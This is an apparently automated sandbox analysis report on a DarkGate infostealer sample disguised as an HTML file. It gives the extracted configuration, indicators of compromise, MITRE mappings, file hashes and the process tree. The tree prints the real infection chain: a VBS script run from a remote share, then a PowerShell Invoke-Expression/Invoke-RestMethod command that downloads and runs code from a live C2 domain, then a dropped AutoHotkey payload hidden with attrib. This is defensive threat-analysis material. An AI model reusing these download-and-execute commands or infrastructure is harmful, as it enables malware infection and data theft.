darkgate | 6e72e76d60990669b323f976897820f4341d0bf8fe7744f69f71ca11a0b2226b

Analysis

max time kernel
329s
max time network
345s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
25-03-2024 16:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

march.html
Size

3KB
MD5

92510eff30850b413b1142df4fbaa06b
SHA1

762cb216fb170574de41e71576fef0780a90092c
SHA256

6e72e76d60990669b323f976897820f4341d0bf8fe7744f69f71ca11a0b2226b
SHA512

799fb0c82143481253fbbc607253bb29d467be9bc0b469f3ff55ae40845d14fd16b20b1cf02cf7a15a0848edd1279f7f5c101a0fd5e1755263f01281ada30aab

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

goingupdate.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
kQwvJqoB
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 8 IoCs

resource	yara_rule
behavioral1/memory/1520-198-0x0000000003130000-0x00000000031A3000-memory.dmp	family_darkgate_v6
behavioral1/memory/1520-200-0x0000000003130000-0x00000000031A3000-memory.dmp	family_darkgate_v6
behavioral1/memory/4400-246-0x0000000002D10000-0x0000000002D83000-memory.dmp	family_darkgate_v6
behavioral1/memory/4400-248-0x0000000002D10000-0x0000000002D83000-memory.dmp	family_darkgate_v6
behavioral1/memory/1512-312-0x00000000045A0000-0x0000000004613000-memory.dmp	family_darkgate_v6
behavioral1/memory/1512-314-0x00000000045A0000-0x0000000004613000-memory.dmp	family_darkgate_v6
behavioral1/memory/3608-375-0x0000000002D80000-0x0000000002DF3000-memory.dmp	family_darkgate_v6
behavioral1/memory/3608-376-0x0000000002D80000-0x0000000002DF3000-memory.dmp	family_darkgate_v6

Blocklisted process makes network request 16 IoCs

flow	pid	Process
24	4732	powershell.exe
25	4732	powershell.exe
27	4732	powershell.exe
28	4732	powershell.exe
29	3320	powershell.exe
30	3320	powershell.exe
31	3320	powershell.exe
32	3320	powershell.exe
38	2640	powershell.exe
39	2640	powershell.exe
45	2640	powershell.exe
46	2640	powershell.exe
53	4984	powershell.exe
54	4984	powershell.exe
55	4984	powershell.exe
56	4984	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
1520	AutoHotkey.exe
4400	AutoHotkey.exe
1512	AutoHotkey.exe
3608	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133558576749949101"	chrome.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 3100c301c55c5c3137302e3133302e35352e3133305c7368617265004d6963726f736f6674204e6574776f726b000002000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailableTime = "240633890"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = bf000000b900bbaf933bab000400000000002d000000315350537343e50abe43ad4f85e469dc8633986e110000000b000000000b000000ffff0000000000004d0000003153505330f125b7ef471a10a5f102608c9eebac310000000a000000001f0000000f0000003100370030002e003100330030002e00350035002e0031003300300000000000000000002d000000315350533aa4bddeb337834391e74498da2995ab1100000003000000001300000000000000000000000000000000000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f580d1a2cf021be504388b07367fc96ef3c0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailable = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
3320	powershell.exe
3320	powershell.exe
3320	powershell.exe
3320	powershell.exe
4368	chrome.exe
4368	chrome.exe
2640	powershell.exe
2640	powershell.exe
2640	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 2056	3300	chrome.exe	72
PID 3300 wrote to memory of 2056	3300	chrome.exe	72
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 2904	3300	chrome.exe	74
PID 3300 wrote to memory of 1028	3300	chrome.exe	75
PID 3300 wrote to memory of 1028	3300	chrome.exe	75
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76
PID 3300 wrote to memory of 4740	3300	chrome.exe	76

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3964	attrib.exe
692	attrib.exe
4792	attrib.exe
3704	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\march.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffad04d9758,0x7ffad04d9768,0x7ffad04d9778
  2⤵
  PID:2056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:2
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:8
  2⤵
  PID:1028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:8
  2⤵
  PID:4740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:1
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4628 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:1
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3212 --field-trial-handle=1800,i,11334539339085680797,17683702688197855687,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4368

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\25-2024.vbs"
1⤵
PID:2120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'goingupdate.com/autivzox')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:4732
- - C:\klhd\AutoHotkey.exe
    "C:\klhd\AutoHotkey.exe" C:/klhd/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1520
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/klhd/
    3⤵
    - Views/modifies file attributes
    PID:692

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\25-2024.vbs"
1⤵
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'goingupdate.com/autivzox')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:3320
- - C:\klhd\AutoHotkey.exe
    "C:\klhd\AutoHotkey.exe" C:/klhd/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:4400
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/klhd/
    3⤵
    - Views/modifies file attributes
    PID:4792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\25-2024.vbs"
1⤵
PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'goingupdate.com/autivzox')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:2640
- - C:\klhd\AutoHotkey.exe
    "C:\klhd\AutoHotkey.exe" C:/klhd/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1512
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/klhd/
    3⤵
    - Views/modifies file attributes
    PID:3704

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:3588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\170.130.55.130\share\25-2024.vbs"
1⤵
PID:3892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'goingupdate.com/autivzox')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- - C:\klhd\AutoHotkey.exe
    "C:\klhd\AutoHotkey.exe" C:/klhd/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:3608
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/klhd/
    3⤵
    - Views/modifies file attributes
    PID:3964

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" \\170.130.55.130\share\25-2024.vbs
1⤵
PID:1116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\dhckdhg\bahfkbd

Filesize
1KB

MD5
8be8969737213bb7a6dab7d537a5a089

SHA1
57eed938a64438d39cfedc70940c96480e9c2bc4

SHA256
d7117d4283a49c87efd05593690f4d9b7157435487a5105fa9ce0e707d4ecb41

SHA512
9d8cc36eaac3cc2d3ad0973f71f6e2fcc1ca71fd9ec7e0aadb0c4c00685b9ee68bebbf76875d1d26be1e22a7b6195198e2f7e3f258434f3e5b9b2c3ceb881747

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
987B

MD5
1068a3bdf5c2ce2b4842ae19ce382396

SHA1
7be6a5eaac0f1af85a95f0e2d4907674ffcc5e7c

SHA256
88f8e5c1fbf40cd989fa94d180f205c300ea04078fe8e2741b310e0b46f10d7f

SHA512
abecf3a8b6a893a678c9604eaa2ce40a017efcf8cfd5cf022b2a2fd7c9c3ae2929b2d7a1eda76766a04bb8c05025f09aab78a43273dd915ccf5d2a25467b9067

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
783B

MD5
bcd019aa4c787594b4f931632f89552e

SHA1
8efe32ebb15ef2550ba5ad605f0cf663ff56b589

SHA256
7d9f1712eff7e913dfc328e30ad49da86c0abef8ff735fb4977cf093c87cee80

SHA512
b81ceb73466e0750bc07f64de762a995dc7ec4f411cab44a06a2b14416da56013b4b1d58469aa223d5d46019463d3ba6539211067490afe7e8e6a9568e8f9ce7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
706B

MD5
8623fbe3b8fe8e5b2b4650961014cfb1

SHA1
9d9d86d13dfa27e9101ec559f91ec6ab2f5ee147

SHA256
41f68fd2d650920ab52992b95540773e2cc5b89922d2735cd11e232b663a0540

SHA512
